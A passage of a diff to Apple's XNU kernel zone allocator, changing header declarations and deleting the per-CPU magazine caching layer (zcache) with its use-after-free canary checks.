+ * @function zone_foreign_mem_init + * + * @brief * Steal memory from pmap (prior to initialization of zalloc) * for the special vm zones that allow foreign memory and store - * the range so as to facilitate range checking in zfree/zcram. + * the range so as to facilitate range checking in zfree. */ __startup_func -extern vm_offset_t zone_foreign_mem_init(vm_size_t size); +extern vm_offset_t zone_foreign_mem_init( + vm_size_t size); -/* - * Returns size (greater than min_pages) that is a multiple - * of the allocation granule for the zone. +/*! + * @function zone_get_foreign_alloc_size + * + * @brief + * Compute the correct size (greater than @c ptoa(min_pages)) that is a multiple + * of the allocation granule for the zone with the given creation flags and + * element size. */ __startup_func extern vm_size_t zone_get_foreign_alloc_size( @@ -395,6 +506,22 @@ extern vm_size_t zone_get_foreign_alloc_size( zone_create_flags_t flags, uint16_t min_pages); +/*! + * @function zone_cram_foreign + * + * @brief + * Cram memory allocated with @c zone_foreign_mem_init() into a zone. + * + * @param zone The zone to cram memory into. + * @param newmem The base address for the memory to cram. + * @param size The size of the memory to cram into the zone. + */ +__startup_func +extern void zone_cram_foreign( + zone_t zone, + vm_offset_t newmem, + vm_size_t size); + extern bool zone_maps_owned( vm_address_t addr, vm_size_t size); @@ -404,8 +531,8 @@ extern void zone_map_sizes( vm_map_size_t *pfree, vm_map_size_t *plargest_free); -extern boolean_t -is_zone_map_nearing_exhaustion(void); +extern bool +zone_map_nearing_exhaustion(void); #if defined(__LP64__) #define ZONE_POISON 0xdeadbeefdeadbeef @@ -413,12 +540,6 @@ is_zone_map_nearing_exhaustion(void); #define ZONE_POISON 0xdeadbeef #endif -/* - * Used by zalloc_direct_locked() and zcache to mark elements that have been - * cleared or poisoned and need to be checked. 
- */ -#define ZALLOC_ELEMENT_NEEDS_VALIDATION ((vm_offset_t)1) - static inline vm_tag_t zalloc_flags_get_tag(zalloc_flags_t flags) { @@ -428,54 +549,23 @@ zalloc_flags_get_tag(zalloc_flags_t flags) extern void *zalloc_ext( zone_t zone, zone_stats_t zstats, - zalloc_flags_t flags, - vm_size_t wasted); + zalloc_flags_t flags); extern void zfree_ext( zone_t zone, zone_stats_t zstats, void *addr); -/* free an element with no regard for gzalloc, zleaks, or kasan*/ -extern void zfree_direct_locked( - zone_t zone, - vm_offset_t elem, - bool poison); - -/* - * attempts to allocate an element with no regard for gzalloc, zleaks, or kasan - * returns an address possibly tagged with ZALLOC_ELEMENT_NEEDS_VALIDATION. +/*! + * @function zone_replenish_configure + * + * @brief + * Used by zones backing the VM to maintain a reserve of free elements. + * + * @discussion + * This function should not be used by anyone else than the VM. */ -extern vm_offset_t zalloc_direct_locked( - zone_t zone, - zalloc_flags_t flags, - vm_size_t waste); - -extern uint32_t zone_poison_count_init( - zone_t zone); - -extern bool zfree_clear_or_poison( - zone_t zone, - uint32_t *zp_count, - vm_address_t addr); - -extern void zone_clear_freelist_pointers( - zone_t zone, - vm_offset_t addr); - -#if ZALLOC_ENABLE_POISONING -extern void zalloc_validate_element( - zone_t zone, - vm_offset_t addr, - vm_size_t size, - bool validate); -#endif - -extern void zone_allocated_element_validate( - zone_t zone, - vm_offset_t addr); - -extern void zone_prio_refill_configure( +extern void zone_replenish_configure( zone_t zone); extern vm_size_t zone_element_size( @@ -526,8 +616,35 @@ extern uint32_t zone_index_from_tag_index( #endif /* VM_MAX_TAG_ZONES */ -#define lock_zone(zone) simple_lock(&(zone)->lock, &zone_locks_grp) -#define unlock_zone(zone) simple_unlock(&(zone)->lock) +static inline void +zone_lock(zone_t zone) +{ +#if KASAN_ZALLOC + spl_t s = 0; + if (zone->kasan_fakestacks) { + s = splsched(); + } +#endif /* 
KASAN_ZALLOC */ + lck_spin_lock(&zone->z_lock); +#if KASAN_ZALLOC + zone->z_kasan_spl = s; +#endif /* KASAN_ZALLOC */ +} + +static inline void +zone_unlock(zone_t zone) +{ +#if KASAN_ZALLOC + spl_t s = zone->z_kasan_spl; + zone->z_kasan_spl = 0; +#endif /* KASAN_ZALLOC */ + lck_spin_unlock(&zone->z_lock); +#if KASAN_ZALLOC + if (zone->kasan_fakestacks) { + splx(s); + } +#endif /* KASAN_ZALLOC */ +} #if CONFIG_GZALLOC void gzalloc_init(vm_size_t); diff --git a/osfmk/kern/zcache.c b/osfmk/kern/zcache.c deleted file mode 100644 index f0889994d..000000000 --- a/osfmk/kern/zcache.c +++ /dev/null @@ -1,698 +0,0 @@ -/* - * Copyright (c) 2017-2020 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. 
- * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ - -#include -#include -#include -#include -#include -#include - -/* Size of array in magazine determined by boot-arg or default */ -TUNABLE(uint16_t, magazine_element_count, "zcc_magazine_element_count", 8); - -/* Size of depot lists determined by boot-arg or default */ -TUNABLE(uint16_t, depot_element_count, "zcc_depot_element_count", 8); - -SECURITY_READ_ONLY_LATE(zone_t) magazine_zone; /* zone to allocate zcc_magazine structs from */ -SECURITY_READ_ONLY_LATE(uintptr_t) zcache_canary; /* Canary used for the caching layer to prevent UaF attacks */ - -/* - * The zcc_magazine is used as a stack to store cached zone elements. These - * sets of elements can be moved around to perform bulk operations. - */ -struct zcc_magazine { - uint32_t zcc_magazine_index; /* Used as a stack pointer to acess elements in the array */ - uint32_t zcc_magazine_capacity; /* Number of pointers able to be stored in the zcc_elements array */ - vm_offset_t zcc_elements[0]; /* Array of pointers to objects */ -}; - - -/* - * Each CPU will use one of these to store its elements - */ -struct zcc_per_cpu_cache { - /* Magazine from which we will always try to allocate from and free to first */ - struct zcc_magazine *current; - /* Dedicated magazine for a quick reload and to prevent thrashing wen we swap with the depot */ - struct zcc_magazine *previous; - /* Zcache poisoning count */ - uint32_t zp_count; -#if ZALLOC_DETAILED_STATS - uint64_t zcc_allocs; - uint64_t zcc_frees; -#endif /* ZALLOC_DETAILED_STATS */ -}; - - -/* This is the basic struct to take care of cahing and is included within - * the zone. 
- */ -struct zcc_depot { - /* marks the point in the array where empty magazines begin */ - int zcc_depot_index; - -#if ZALLOC_DETAILED_STATS - uint64_t zcc_swap; - uint64_t zcc_fill; - uint64_t zcc_drain; - uint64_t zcc_fail; - uint64_t zcc_gc; -#endif /* ZALLOC_DETAILED_STATS */ - - /* Stores full and empty magazines in the depot layer */ - struct zcc_magazine *zcc_depot_list[0]; -}; - -static bool zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag); -static void zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag); -static bool zcache_mag_has_space(struct zcc_magazine *mag); -static bool zcache_mag_has_elements(struct zcc_magazine *mag); -static void zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b); -static void zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache); -static void zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache); -static void zcache_canary_add(zone_t zone, vm_offset_t addr); -#if ZALLOC_ENABLE_POISONING -static void zcache_validate_element(zone_t zone, vm_offset_t *addr, bool poison); -static void zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup); -#endif - -/* - * zcache_ready - * - * Returns whether or not the zone caches are ready to use - * - */ -static bool -zcache_ready(void) -{ - return magazine_zone != NULL; -} - -/* - * zcache_bootstrap - * - * Initializes zone to allocate magazines from and sets - * magazine_element_count and depot_element_count from - * boot-args or default values - * - */ -__startup_func -static void -zcache_bootstrap(void) -{ - int magazine_size = sizeof(struct zcc_magazine) + magazine_element_count * sizeof(void *); - zone_t magzone; - - /* Generate the canary value for zone caches */ - zcache_canary = (uintptr_t) early_random(); - - magzone = zone_create("zcc_magazine_zone", magazine_size, - ZC_NOCACHING | ZC_ZFREE_CLEARMEM); - - /* - * This causes 
zcache_ready() to return true. - */ - os_atomic_store(&magazine_zone, magzone, compiler_acq_rel); - - /* - * Now that we are initialized, we can enable zone caching for zones that - * were made before zcache_bootstrap() was called. - * - * The system is still single threaded so we don't need to take the lock. - */ - zone_index_foreach(i) { - if (zone_array[i].cpu_cache_enabled) { - zcache_init(&zone_array[i]); - } - } -} -STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zcache_bootstrap); - -static struct zcc_magazine * -zcache_mag_alloc(void) -{ - struct zcc_magazine *mag = zalloc_flags(magazine_zone, Z_WAITOK); - mag->zcc_magazine_capacity = magazine_element_count; - return mag; -} - - -/* - * zcache_init - * - * Initializes all parts of the per-cpu caches for a given zone - * - * Parameters: - * zone pointer to zone on which to iniitalize caching - * - */ -void -zcache_init(zone_t zone) -{ - struct zcc_per_cpu_cache *pcpu_caches; - struct zcc_depot *depot; - vm_size_t size; - - /* - * If zcache hasn't been initialized yet, remember our decision, - * - * zcache_init() will be called again by zcache_bootstrap(), - * while the system is still single threaded, to build the missing caches. 
- */ - if (!zcache_ready()) { - zone->cpu_cache_enabled = true; - return; - } - - /* Allocate chunk of memory for all structs */ - size = sizeof(struct zcc_depot) + (depot_element_count * sizeof(void *)); - depot = zalloc_permanent(size, ZALIGN_PTR); - - size = sizeof(struct zcc_per_cpu_cache); - pcpu_caches = zalloc_percpu_permanent(size, ZALIGN_PTR); - - /* Initialize a cache for every CPU */ - zpercpu_foreach(cache, pcpu_caches) { - cache->current = zcache_mag_alloc(); - cache->previous = zcache_mag_alloc(); - cache->zp_count = zone_poison_count_init(zone); - } - - /* Initialize empty magazines in the depot list */ - for (int i = 0; i < depot_element_count; i++) { - depot->zcc_depot_list[i] = zcache_mag_alloc(); - } - - lock_zone(zone); - if (zone->zcache.zcc_depot) { - panic("allocating caches for zone %s twice", zone->z_name); - } - - /* Make the initialization of the per-cpu magazines visible. */ - os_atomic_thread_fence(release); - - zone->zcache.zcc_depot = depot; - zone->zcache.zcc_pcpu = pcpu_caches; - zone->cpu_cache_enabled = true; - unlock_zone(zone); -} - -/* - * zcache_drain_depot - * - * Frees all the full magazines from the depot layer to the zone allocator as part - * of zone_gc(). 
The routine assumes that only one zone_gc() is in progress (zone_gc_lock - * ensures that) - * - * Parameters: - * zone pointer to zone for which the depot layer needs to be drained - * - * Returns: None - * - */ -void -zcache_drain_depot(zone_t zone) -{ - struct zcc_depot *depot; - int drain_depot_index = 0; - - lock_zone(zone); - depot = zone->zcache.zcc_depot; - drain_depot_index = depot->zcc_depot_index; - for (int i = 0; i < drain_depot_index; i++) { - zcache_mag_drain_locked(zone, depot->zcc_depot_list[i]); - } -#if ZALLOC_DETAILED_STATS - depot->zcc_gc += drain_depot_index; -#endif /* ZALLOC_DETAILED_STATS */ - depot->zcc_depot_index = 0; - unlock_zone(zone); -} - -__attribute__((noinline)) -static void -zcache_free_to_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache) -{ - struct zcc_depot *depot; - - lock_zone(zone); - depot = zone->zcache.zcc_depot; - if (depot->zcc_depot_index < depot_element_count) { - /* If able, rotate in a new empty magazine from the depot and retry */ - zcache_mag_depot_swap_for_free(depot, per_cpu_cache); - } else { - /* Free an entire magazine of elements */ - zcache_mag_drain_locked(zone, per_cpu_cache->current); -#if ZALLOC_DETAILED_STATS - depot->zcc_drain++; -#endif /* ZALLOC_DETAILED_STATS */ - } - unlock_zone(zone); -} - - -void -zcache_free_to_cpu_cache(zone_t zone, zone_stats_t zstats, vm_offset_t addr) -{ - struct zcc_per_cpu_cache *per_cpu_cache; - vm_offset_t elem = addr; - int cpu; - - zone_allocated_element_validate(zone, elem); - - /* - * This is racy but we don't need zp_count to be accurate. - * This allows us to do the poisoning with preemption enabled. 
- */ - per_cpu_cache = zpercpu_get(zone->zcache.zcc_pcpu); - if (zfree_clear_or_poison(zone, &per_cpu_cache->zp_count, elem)) { - addr |= ZALLOC_ELEMENT_NEEDS_VALIDATION; - } else { - zcache_canary_add(zone, elem); - } - -#if KASAN_ZALLOC - kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED); -#endif - - disable_preemption(); - cpu = cpu_number(); - per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu); - - if (zcache_mag_has_space(per_cpu_cache->current)) { - /* If able, free into current magazine */ - } else if (zcache_mag_has_space(per_cpu_cache->previous)) { - /* If able, swap current and previous magazine and retry */ - zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current); - } else { - zcache_free_to_cpu_cache_slow(zone, per_cpu_cache); - } - - struct zcc_magazine *mag = per_cpu_cache->current; - mag->zcc_elements[mag->zcc_magazine_index++] = addr; - zpercpu_get_cpu(zstats, cpu)->zs_mem_freed += zone_elem_size(zone); -#if ZALLOC_DETAILED_STATS - per_cpu_cache->zcc_frees++; -#endif /* ZALLOC_DETAILED_STATS */ - - enable_preemption(); -} - -__attribute__((noinline)) -static bool -zcache_alloc_from_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache) -{ - struct zcc_depot *depot; - - lock_zone(zone); - depot = zone->zcache.zcc_depot; - if (depot->zcc_depot_index > 0) { - /* If able, rotate in a full magazine from the depot */ - zcache_mag_depot_swap_for_alloc(depot, per_cpu_cache); - } else if (zcache_mag_fill_locked(zone, per_cpu_cache->current)) { -#if ZALLOC_DETAILED_STATS - depot->zcc_fill++; -#endif /* ZALLOC_DETAILED_STATS */ - } else { -#if ZALLOC_DETAILED_STATS - depot->zcc_fail++; -#endif /* ZALLOC_DETAILED_STATS */ - /* If unable to allocate from cache return NULL and fall through to zalloc */ - unlock_zone(zone); - enable_preemption(); - return false; - } - unlock_zone(zone); - - return true; -} - -vm_offset_t -zcache_alloc_from_cpu_cache(zone_t zone, zone_stats_t zstats, vm_size_t waste) -{ - 
struct zcc_per_cpu_cache *per_cpu_cache; - int cpu; - - disable_preemption(); - cpu = cpu_number(); - per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu); - - if (zcache_mag_has_elements(per_cpu_cache->current)) { - /* If able, allocate from current magazine */ - } else if (zcache_mag_has_elements(per_cpu_cache->previous)) { - /* If able, swap current and previous magazine and retry */ - zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current); - } else if (!zcache_alloc_from_cpu_cache_slow(zone, per_cpu_cache)) { - return (vm_offset_t)NULL; - } - - struct zcc_magazine *mag = per_cpu_cache->current; - vm_offset_t elem_size = zone_elem_size(zone); - uint32_t index = --mag->zcc_magazine_index; - vm_offset_t addr = mag->zcc_elements[index]; - mag->zcc_elements[index] = 0; - zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size; -#if ZALLOC_DETAILED_STATS - if (waste) { - zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste; - } - per_cpu_cache->zcc_allocs++; -#else - (void)waste; -#endif /* ZALLOC_DETAILED_STATS */ - - enable_preemption(); - -#if ZALLOC_ENABLE_POISONING - bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION; -#endif /* ZALLOC_ENABLE_POISONING */ - - addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - -#if KASAN_ZALLOC - kasan_poison_range(addr, elem_size, ASAN_VALID); -#endif -#if ZALLOC_ENABLE_POISONING - if (!validate) { - vm_offset_t backup = addr + elem_size - sizeof(vm_offset_t); - zcache_validate_and_clear_canary(zone, (vm_offset_t *)addr, - (vm_offset_t *)backup); - } - zalloc_validate_element(zone, addr, elem_size, validate); -#endif /* ZALLOC_ENABLE_POISONING */ - - return addr; -} - - -/* - * zcache_mag_fill_locked - * - * Fills a magazine with as many elements as the zone can give - * without blocking to carve out more memory - * - * Parameters: - * zone zone from which to allocate - * mag pointer to magazine to fill - * - * Return: True if able to allocate elements, false is mag is still empty - */ -static bool 
-zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag) -{ - uint32_t i = mag->zcc_magazine_index; - uint32_t end = mag->zcc_magazine_capacity; - vm_offset_t elem, addr; - - while (i < end && zone->countfree) { - addr = zalloc_direct_locked(zone, Z_NOWAIT, 0); - elem = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - if (addr & ZALLOC_ELEMENT_NEEDS_VALIDATION) { - zone_clear_freelist_pointers(zone, elem); - } else { - zcache_canary_add(zone, elem); - } -#if KASAN_ZALLOC - kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED); -#endif - mag->zcc_elements[i++] = addr; - } - - mag->zcc_magazine_index = i; - - return i != 0; -} - -/* - * zcache_mag_drain_locked - * - * Frees all elements in a magazine - * - * Parameters: - * zone zone to which elements will be freed - * mag pointer to magazine to empty - * - */ -static void -zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag) -{ - vm_offset_t elem, addr; - bool poison; - - for (uint32_t i = 0, end = mag->zcc_magazine_index; i < end; i++) { - addr = mag->zcc_elements[i]; - poison = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION; - elem = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - -#if ZALLOC_ENABLE_POISONING - zcache_validate_element(zone, (vm_offset_t *)elem, poison); -#endif /* ZALLOC_ENABLE_POISONING */ - zfree_direct_locked(zone, elem, poison); - mag->zcc_elements[i] = 0; - } - mag->zcc_magazine_index = 0; -} - - -/* - * zcache_mag_has_space - * - * Checks if magazine still has capacity - * - * Parameters: - * mag pointer to magazine to check - * - * Returns: true if magazine is full - * - */ -static bool -zcache_mag_has_space(struct zcc_magazine *mag) -{ - return mag->zcc_magazine_index < mag->zcc_magazine_capacity; -} - - -/* - * zcache_mag_has_elements - * - * Checks if magazine is empty - * - * Parameters: - * mag pointer to magazine to check - * - * Returns: true if magazine has no elements - * - */ -static bool -zcache_mag_has_elements(struct zcc_magazine *mag) -{ - return mag->zcc_magazine_index 
> 0; -} - - -/* - * zcache_swap_magazines - * - * Function which swaps two pointers of any type - * - * Parameters: - * a pointer to first pointer - * b pointer to second pointer - */ -static void -zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b) -{ - struct zcc_magazine *temp = *a; - *a = *b; - *b = temp; -} - - -/* - * zcache_mag_depot_swap_for_alloc - * - * Swaps a full magazine into the current position - * - * Parameters: - * depot pointer to the depot - * cache pointer to the current per-cpu cache - * - * Precondition: Check that the depot list has full elements - */ -static void -zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache) -{ - /* Loads a full magazine from which we can allocate */ - assert(depot->zcc_depot_index > 0); - depot->zcc_depot_index--; -#if ZALLOC_DETAILED_STATS - depot->zcc_swap++; -#endif /* ZALLOC_DETAILED_STATS */ - zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]); -} - - -/* - * zcache_mag_depot_swap_for_free - * - * Swaps an empty magazine into the current position - * - * Parameters: - * depot pointer to the depot - * cache pointer to the current per-cpu cache - * - * Precondition: Check that the depot list has empty elements - */ -static void -zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache) -{ - /* Loads an empty magazine into which we can free */ - assert(depot->zcc_depot_index < depot_element_count); - zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]); -#if ZALLOC_DETAILED_STATS - depot->zcc_swap++; -#endif /* ZALLOC_DETAILED_STATS */ - depot->zcc_depot_index++; -} - -/* - * zcache_canary_add - * - * Adds a canary to an element by putting zcache_canary at the first - * and last location of the element - * - * Parameters: - * zone zone for the element - * addr element address to add canary to - */ -static void -zcache_canary_add(zone_t zone, vm_offset_t 
element) -{ -#if ZALLOC_ENABLE_POISONING - vm_offset_t *primary = (vm_offset_t *)element; - vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary + - zone_elem_size(zone) - sizeof(vm_offset_t)); - *primary = *backup = (zcache_canary ^ (uintptr_t)element); -#else -#pragma unused(zone, element) -#endif -} - -#if ZALLOC_ENABLE_POISONING -__abortlike static void -zcache_validation_panic(zone_t zone, vm_offset_t *primary, vm_offset_t *backup, - vm_offset_t permutation) -{ - vm_offset_t primary_value = 0; - vm_offset_t backup_value = 0; - - if (permutation == zcache_canary) { - primary_value = *primary ^ (vm_offset_t)primary; - backup_value = *backup ^ (vm_offset_t)primary; - permutation = permutation ^ (vm_offset_t)primary; - } else { - primary_value = *primary; - backup_value = *backup; - } - if (primary_value != permutation) { - panic("Zone cache element was used after free! Element %p was corrupted at " - "beginning; Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)", - primary, (uintptr_t) permutation, (uintptr_t) *primary, zcache_canary, zone, - zone_heap_name(zone), zone->z_name); - } else { - panic("Zone cache element was used after free! Element %p was corrupted at end; " - "Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)", - primary, (uintptr_t) permutation, (uintptr_t) *backup, zcache_canary, zone, - zone_heap_name(zone), zone->z_name); - } -} - -/* - * zcache_validate_and_clear_canary - * - * Validates an element of the zone cache to make sure it still contains the zone - * caching canary and clears it. 
- * - * Parameters: - * zone zone for the element - * primary addr of canary placed in front - * backup addr of canary placed at the back - */ -static void -zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup) -{ - vm_offset_t primary_value = (*primary ^ (uintptr_t)primary); - vm_offset_t backup_value = (*backup ^ (uintptr_t)primary); - - if (primary_value == zcache_canary && backup_value == zcache_canary) { - *primary = *backup = ZONE_POISON; - } else { - zcache_validation_panic(zone, primary, backup, zcache_canary); - } -} - -/* - * zcache_validate_element - * - * Validates the first and last pointer size of the element to ensure - * that they haven't been altered. This function is used when an - * element moves from cache to zone, therefore only validing the - * first and last pointer size (location of future freelist pointers). - * - * Parameters: - * zone zone for the element - * element addr of element to validate - * poison has the element been poisoned - */ -static void -zcache_validate_element(zone_t zone, vm_offset_t *element, bool poison) -{ - vm_offset_t *primary = (vm_offset_t *)element; - vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary + - zone_elem_size(zone) - sizeof(vm_offset_t)); - - if (zone->zfree_clear_mem) { - if (*primary == 0 && *backup == 0) { - return; - } else { - zcache_validation_panic(zone, primary, backup, 0); - } - } - - if (__probable(!poison)) { - zcache_validate_and_clear_canary(zone, primary, backup); - } else { - if (*primary == ZONE_POISON && *backup == ZONE_POISON) { - return; - } else { - zcache_validation_panic(zone, primary, backup, ZONE_POISON); - } - } -} -#endif /* ZALLOC_ENABLE_POISONING */ diff --git a/osfmk/kern/zcache_internal.h b/osfmk/kern/zcache_internal.h deleted file mode 100644 index 2cafb525c..000000000 --- a/osfmk/kern/zcache_internal.h +++ /dev/null @@ -1,206 +0,0 @@ -/* - * Copyright (c) 2017-2020 Apple Inc. All rights reserved. 
- * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * Below is a diagram of the caching system. This design is based of the - * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and - * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams. It is divided into 3 - * layers: the Per-cpu Layer, the Depot Layer, and the Zone Allocator. The - * Per-CPU and Depot layers store elements using arrays we call magazines. - * - * Magazines function like a stack (we push and pop elements) and can be - * moved around for bulk operations. 
- * _________ _________ _________ - * | CPU 1 | | CPU 2 | | CPU 3 | - * | _ _ | | _ _ | | _ _ | - * | |#| | | | | | | |#| | | |#| |#| | Per-CPU Layer - * | |#| |_| | | |_| |#| | | |#| |#| | - * |_________| |_________| |_________| - * - * ______________________________________________ - * | _ _ _ _ _ _ | - * | |#| |#| |#| | | | | | | | Depot Layer - * | |#| |#| |#| |_| |_| |_| | - * |______________________________________________| - * - * _______________________________________________ - * | # | # | # | # | # | # | # | # | # | # | # | # | Zone Allocator - * |_______________________________________________| - * - * The top layer is the per-cpu cache and consists of a current and - * previous magazine for each CPU. The current magazine is the one we always try - * to allocate from and free to first. Only if we are unable, do we check the - * previous magazine. If the previous magazine can satisfy the allocate or free, - * then we switch the two and allocate from the new current magazine. This layer - * requires no locking, so we can access multiple CPU's caches concurrently. - * This is the main source of the speedup. - * - * We have two magazines here to prevent thrashing when swapping magazines - * with the depot layer. If a certain pattern of alloc and free are called we - * can waste a lot of time swapping magazines to and from the depot layer. We - * prevent this by dividing the per-cpu cache into two separate magazines. - * - * The middle layer is the magazine depot. This layer consists of a - * collection of full and empty magazines. These are used to reload the per-cpu - * caches when needed. This is implemented as an array of magazines which are - * initially all empty and as we fill up magazines we increment the index to - * point at the first empty magazine. Since this layer is per-zone, it allows us - * to balance the cache between cpus, but does require taking a lock. 
- * - * When neither the current nor previous magazine for a given CPU can - * satisfy the free or allocation, we look to the depot layer. If there are - * magazines in the depot that can satisfy the free or allocation we swap - * that magazine into the current position. In the example below, to allocate on - * the given CPU we must lock the depot layer and swap magazine A with magazine - * B and decrement the depot index. - * - * _____________________ _______________________________________ - * | Per-CPU Cache | | Depot Layer | - * | | | | - * | A___ ____ | | ____ B___ ____ ____ | - * | | | | | | | | ## | | ## | | | | | | - * | | | | | | | | ## | | ## | | | | | | - * | | | | | | | | ## | | ## | | | | | | - * | | | | | | | | ## | | ## | | | | | | - * | |____| |____| | | |_##_| |_##_| |____| |____| | - * | Current Previous | | | - * |_____________________| |_______________________________________| - * - * The bottom layer is the Zone Allocator. This is already implemented in - * XNU and will remain mostly unchanged. Implementation for this can be found - * in zalloc.c and zalloc.h. We will only use the zone if all other layers are - * unable to satisfy the allocation or free. When we do use the zone, we will - * try to allocate an entire magazine of elements or free an entire magazine of - * elements at once. - * - * Caching must be enabled explicitly, by calling zone_create() with the - * ZC_CACHING flag, for every zone you want to cache elements for. Zones - * which are good candidates for this are ones with highly contended zone locks. - * - * Some good potential candidates are kalloc.16, kalloc.48, Vm objects, VM map - * entries, ipc vouchers, and ipc ports. 
- * - * - * Some factors can be tuned by boot-arg: - * zcc_enable_for_zone_name name of a single zone to enable caching for - * (replace space characters with '.') - * - * zcc_magazine_element_count integer value for magazine size used for all - * zones (default 8 is used if not specified) - * - * zcc_depot_element_count integer value for how many full and empty - * magazines to store in the depot, if N specified - * depot will have N full and N empty magazines - * (default 16 used if not specified) - */ - -#ifndef _KERN_ZCACHE_H_ -#define _KERN_ZCACHE_H_ - -#include -#include /* zone_stats_t */ -#include - -#if CONFIG_ZCACHE -#pragma GCC visibility push(hidden) - -__BEGIN_DECLS - -struct zone_cache { - struct zcc_per_cpu_cache *__zpercpu zcc_pcpu; - struct zcc_depot *zcc_depot; -}; - -/** - * @function zcache_init - * - * @abstract - * Initializes all parts of the per-cpu caches for a given zone - * - * @param zone pointer to zone on which to iniitalize caching - * - */ -extern void zcache_init( - zone_t zone); - - -/** - * @function zcache_free_to_cpu_cache() - * - * @abstract - * Checks per-cpu caches to free element there if possible. - * - * @discussion - * The caller is responsible for checking that caching is enabled for zone. - * - * @param zone pointer to zone for which element comes from - * @param zstats pointer to the per-cpu statistics to maintain - * @param addr adddress of the element to free - */ -extern void zcache_free_to_cpu_cache( - zone_t zone, - zone_stats_t zstats, - vm_offset_t addr); - - -/** - * @function zcache_alloc_from_cpu_cache - * - * @abstract - * Checks per-cpu caches to allocate element from there if possible - * - * @discussion - * The caller is responsible for checking that caching is enabled for zone. 
